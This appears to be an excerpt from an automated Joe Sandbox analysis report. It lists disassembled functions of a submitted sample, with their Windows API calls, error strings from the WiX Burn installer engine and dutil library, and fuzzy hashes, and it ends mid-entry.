                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\inetutil.cpp$failed to convert system time to file time$failed to get create time for internet file handle
                                                                                                                                                                  • API String ID: 1528435940-425296829
                                                                                                                                                                  • Opcode ID: 858452d0e90e818d70f6570a8a1eec25a18ee129d37887560ed20738a005f571
                                                                                                                                                                  • Instruction ID: 681e1bd0caf4714f1f94d9383c5549ecd0d9363ba005c9ef78c43a0f91cd1e27
                                                                                                                                                                  • Opcode Fuzzy Hash: 858452d0e90e818d70f6570a8a1eec25a18ee129d37887560ed20738a005f571
                                                                                                                                                                  • Instruction Fuzzy Hash: 0F210A73E01229B7E3209AA48C49FBFB7ACAF49B50F014525BE08FB190E674DD0087E5
                                                                                                                                                                  Function 0093E1D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                                  • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                  • API String ID: 1970631241-1065166858
                                                                                                                                                                  • Opcode ID: 86921d8d6db00ba4fe6442f7295763d56f59b1d9b5af89f3ff240b7f67587d5b
                                                                                                                                                                  • Instruction ID: 2dc683f0936a5377ae1b30222d773d0ecbcf1d25a4f2b31dba374542625cebbb
                                                                                                                                                                  • Opcode Fuzzy Hash: 86921d8d6db00ba4fe6442f7295763d56f59b1d9b5af89f3ff240b7f67587d5b
                                                                                                                                                                  • Instruction Fuzzy Hash: 34212176640205BBDB01CF5DCC8AE9B3BACEF89B14F110054FA14EB2D6E6B0D900DB60
                                                                                                                                                                  Function 0096B523 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,?,?,?,00000000,?,?,?,0096B4C2,?), ref: 0096B5EF
                                                                                                                                                                  Strings
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 0096B539
                                                                                                                                                                  • Failed to read registry value to detect UAC., xrefs: 0096B5C7
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\osutil.cpp, xrefs: 0096B582
                                                                                                                                                                  • EnableLUA, xrefs: 0096B599
                                                                                                                                                                  • Failed to open system policy key to detect UAC., xrefs: 0096B573
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: EnableLUA$Failed to open system policy key to detect UAC.$Failed to read registry value to detect UAC.$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\osutil.cpp
                                                                                                                                                                  • API String ID: 3535843008-1917839530
                                                                                                                                                                  • Opcode ID: 4b23d2167dd1e92f8940f87906d1084d4f49aef79fba1aa517d4e8acf4b76f91
                                                                                                                                                                  • Instruction ID: f79e9e263f28b1fac7da72d41f6ae252c904e5762ac08480feea4e0d1cef7998
                                                                                                                                                                  • Opcode Fuzzy Hash: 4b23d2167dd1e92f8940f87906d1084d4f49aef79fba1aa517d4e8acf4b76f91
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D212B72E80336FBD7215AA88C8BFEAA56C9F00760F150535BA42FB190F3B48DC092D0
                                                                                                                                                                  Function 00912B25 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 79windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FormatMessageW.KERNEL32(-000011F7,00000008,?,00000000,00000000,00000000,00000000,80070656,?,?,?,0093D303,00000000,00000008,00000000,80070656), ref: 00912B56
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0093D303,00000000,00000008,00000000,80070656,?,?,0092A7BB,00000001,00000000,80070656,00000000,?), ref: 00912B63
                                                                                                                                                                  • LocalFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0093D303,00000000,00000008,00000000,80070656,?,?,0092A7BB,00000001), ref: 00912BE7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                  • String ID: Failed to allocate string for message.$Failed to format message for error: 0x%x$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\strutil.cpp
                                                                                                                                                                  • API String ID: 1365068426-3351270200
                                                                                                                                                                  • Opcode ID: beb392225e06055525bb3447d52182667e08d68d06cdabf2a9c201531a023e85
                                                                                                                                                                  • Instruction ID: 814e7609cb2103b242b2aeef52ff84cf4dfc02e8e2fb7d37c5892d1ebe5eef11
                                                                                                                                                                  • Opcode Fuzzy Hash: beb392225e06055525bb3447d52182667e08d68d06cdabf2a9c201531a023e85
                                                                                                                                                                  • Instruction Fuzzy Hash: A421D8B7A4122DBBEB215F94CC4AFEF7A6CDB49754F004061FD04F6190E2748D5096E0
                                                                                                                                                                  Function 00970BEE Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 78memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(00917D9B), ref: 00970C6C
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00970CB6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to allocate bstr for XPath expression in XmlSelectNodes$pixnParent parameter was null in XmlSelectNodes$ppixnChild parameter was null in XmlSelectNodes
                                                                                                                                                                  • API String ID: 344208780-3683195698
                                                                                                                                                                  • Opcode ID: af3e689a9aad3cad361d8611a8e539d4b11b837be9a793114db4c6a82f8d2ead
                                                                                                                                                                  • Instruction ID: 9f343b358f3c652ec00ea801e00e3c97620e2028f6648b31ef1d39d7f291791f
                                                                                                                                                                  • Opcode Fuzzy Hash: af3e689a9aad3cad361d8611a8e539d4b11b837be9a793114db4c6a82f8d2ead
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D110663780315F7E7321A144C4AF6F219CDBDAB51F15C529FA08BB281DAE48D0187A0
                                                                                                                                                                  Function 00970CC5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 78memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(00917D9B), ref: 00970D43
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00970D8D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to allocate bstr for XPath expression in XmlSelectSingleNode$pixnParent parameter was null in XmlSelectSingleNode$ppixnChild parameter was null in XmlSelectSingleNode
                                                                                                                                                                  • API String ID: 344208780-1462723567
                                                                                                                                                                  • Opcode ID: b9cc2cd94ea13f3237e139ce0df46381d30a01b00b9c28727daf8f1275230713
                                                                                                                                                                  • Instruction ID: 8b1b061b38124a12825081ba4e6eac4b858c30944cda5010b10781fa5599a998
                                                                                                                                                                  • Opcode Fuzzy Hash: b9cc2cd94ea13f3237e139ce0df46381d30a01b00b9c28727daf8f1275230713
                                                                                                                                                                  • Instruction Fuzzy Hash: ED11D333780715F7EB311A444C4AFBF619CDBDAB54F058179BA08BB2C1D6F49E0182A0
                                                                                                                                                                  Function 0093E2B8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0093E336
                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0093E348
                                                                                                                                                                  • SetFileTime.KERNEL32(?,?,?,?), ref: 0093E35B
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0093DE6A,?,?), ref: 0093E36A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                                  • String ID: Invalid operation for this state.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                  • API String ID: 609741386-1831311109
                                                                                                                                                                  • Opcode ID: 4997d4d2b8f84b84b064053be2c48d4890edf4813cb5f1eaf7ab368a8dbf4def
                                                                                                                                                                  • Instruction ID: a3333b96123ec3dc82e3f8463d419441f9fac0c8a9d3416eea454266a5e38037
                                                                                                                                                                  • Opcode Fuzzy Hash: 4997d4d2b8f84b84b064053be2c48d4890edf4813cb5f1eaf7ab368a8dbf4def
                                                                                                                                                                  • Instruction Fuzzy Hash: 5321CFB290021ABBCB10DF698C49AEA7BACFF08720F404656F955E75D0D374EA50CB90
                                                                                                                                                                  Function 00962BC3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00962CD2,?,?,00000000,?,?,?,00962E2C,00000022,FlsSetValue,0099DA4C,0099DA54,?), ref: 00962C84
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                                                                  • Opcode ID: 2440dd0c60dbd5d85d2a45251640c23e65e272f0bcdedf6bb2cd94887ca69443
                                                                                                                                                                  • Instruction ID: 6d3cd859546e6ca1e0e9441d49b479b89ae7c105f23e7969faf3ba9bafe5373e
                                                                                                                                                                  • Opcode Fuzzy Hash: 2440dd0c60dbd5d85d2a45251640c23e65e272f0bcdedf6bb2cd94887ca69443
                                                                                                                                                                  • Instruction Fuzzy Hash: D1212932A05611ABCB219F24DC85A6F376CEF42775F2401A0FC56A72E1EB78ED01D6D1
                                                                                                                                                                  Function 0091D783 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0091D825
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy condition string from BSTR, xrefs: 0091D7FE
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\condition.cpp, xrefs: 0091D810
                                                                                                                                                                  • Failed to get Condition inner text., xrefs: 0091D7D8
                                                                                                                                                                  • Condition, xrefs: 0091D790
                                                                                                                                                                  • Failed to select condition node., xrefs: 0091D7B2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                  • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$d:\a\wix4\wix4\src\burn\engine\condition.cpp
                                                                                                                                                                  • API String ID: 3341692771-1135705897
                                                                                                                                                                  • Opcode ID: 342e276bc19b8f6cc99ca536166064f8fe3ef6894902b06015b3e2dde76c022e
                                                                                                                                                                  • Instruction ID: 547e4e9bee191f8e672b93079b02b9db5d404b2636ce0352ee271faddfc70613
                                                                                                                                                                  • Opcode Fuzzy Hash: 342e276bc19b8f6cc99ca536166064f8fe3ef6894902b06015b3e2dde76c022e
                                                                                                                                                                  • Instruction Fuzzy Hash: 6011E676B8121CBBDB22AB54CC0AFDF7A79DBC4F10F154055F905BB2D0DAB0AA809B50
                                                                                                                                                                  Function 00978BE1 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 69COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00978C80
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                  • String ID: Already process this datetime value.$Failed to convert value to time.$Failed to get value.$clbcatq.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                                  • API String ID: 3341692771-436059191
                                                                                                                                                                  • Opcode ID: 36f898fa48eaf9f15afe62d527cea35e7e315f5b4ec9ca8ad93cf1065f05cb4d
                                                                                                                                                                  • Instruction ID: c55e16a620b1ec2701823b29a79a6c45df1319ef0300e7d023600a8bc46f0e7e
                                                                                                                                                                  • Opcode Fuzzy Hash: 36f898fa48eaf9f15afe62d527cea35e7e315f5b4ec9ca8ad93cf1065f05cb4d
                                                                                                                                                                  • Instruction Fuzzy Hash: 791104B2AC2215BAD7221A458C4EFABBA6CDB91765F188125F70CBB180DAB05D00D6E0
                                                                                                                                                                  Function 00971BF5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • PathAllocCanonicalize.KERNELBASE(?,?,00971D45), ref: 00971C32
                                                                                                                                                                  • LocalFree.KERNEL32(00000000,00000000,?,?,00971D45,00000000,00000001,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00971C9F
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize path2utl., xrefs: 00971C79
                                                                                                                                                                  • Failed to canonicalize: %ls, xrefs: 00971C3D
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp, xrefs: 00971C49, 00971C85
                                                                                                                                                                  • Failed to copy the canonicalized path., xrefs: 00971C6B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocCanonicalizeFreeLocalPath
                                                                                                                                                                  • String ID: Failed to canonicalize: %ls$Failed to copy the canonicalized path.$Failed to initialize path2utl.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                                  • API String ID: 2828741713-2733107982
                                                                                                                                                                  • Opcode ID: f3e36704da81bc0a488aec29e13d07d152cf7c4c3a2d8693018e81c838b6d196
                                                                                                                                                                  • Instruction ID: c1869a84d4cdd1c505cb0443ec6a48905e8a74a6e2f06971aae3234e8c61376f
                                                                                                                                                                  • Opcode Fuzzy Hash: f3e36704da81bc0a488aec29e13d07d152cf7c4c3a2d8693018e81c838b6d196
                                                                                                                                                                  • Instruction Fuzzy Hash: B511E733FC1334B7DB322B988D0BF9E3A949B8AB55F058151FA0DBA1D1E2E09D4096D0
                                                                                                                                                                  Function 00974CDA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,200001A4,00000000,00000000,00000000,200001A4,?,0093B002,00000000), ref: 00974D02
                                                                                                                                                                  • CoCreateInstance.OLE32(00000000,00000000,00000001,009A9150,00000000,?,0093B002,00000000), ref: 00974D2A
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create instance of Microsoft.Update.AutoUpdate., xrefs: 00974D36
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wuautil.cpp, xrefs: 00974D42
                                                                                                                                                                  • Failed to get CLSID for Microsoft.Update.AutoUpdate., xrefs: 00974D0E
                                                                                                                                                                  • Microsoft.Update.AutoUpdate, xrefs: 00974CFD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFromInstanceProg
                                                                                                                                                                  • String ID: Failed to create instance of Microsoft.Update.AutoUpdate.$Failed to get CLSID for Microsoft.Update.AutoUpdate.$Microsoft.Update.AutoUpdate$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wuautil.cpp
                                                                                                                                                                  • API String ID: 2151042543-594154128
                                                                                                                                                                  • Opcode ID: 35373b4d31057f14dc3b97ba9ccf0c063157689809db6d4cd6c38727dcbb8f42
                                                                                                                                                                  • Instruction ID: 9165354c994999895ec50b88de01b77d86890d5c31fcea2e98db7bc442543981
                                                                                                                                                                  • Opcode Fuzzy Hash: 35373b4d31057f14dc3b97ba9ccf0c063157689809db6d4cd6c38727dcbb8f42
                                                                                                                                                                  • Instruction Fuzzy Hash: 5301B572B447197AE72096ACCC46FAF76A89B49B54F420025FB04FB2C1D6A0AD0486E1
                                                                                                                                                                  Function 0097C480 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0097C4FB,0097C6A4), ref: 0097C497
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0097C4AD
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0097C4C2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                  • API String ID: 667068680-1718035505
                                                                                                                                                                  • Opcode ID: acb60b83b8d45a897a22ba74b25b74c2aa190a2fa9d495b0744d6c1664ddad72
                                                                                                                                                                  • Instruction ID: f6cd54fd5afe28b5c38f6d60374e0e593284e92676135635025dcdf53acb485f
                                                                                                                                                                  • Opcode Fuzzy Hash: acb60b83b8d45a897a22ba74b25b74c2aa190a2fa9d495b0744d6c1664ddad72
                                                                                                                                                                  • Instruction Fuzzy Hash: 1BF0C2F375A2225B9B300F649DE5A7A22DCAB47759308807DE90EE7670FA50CC81A2D0
                                                                                                                                                                  Function 009173C3 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
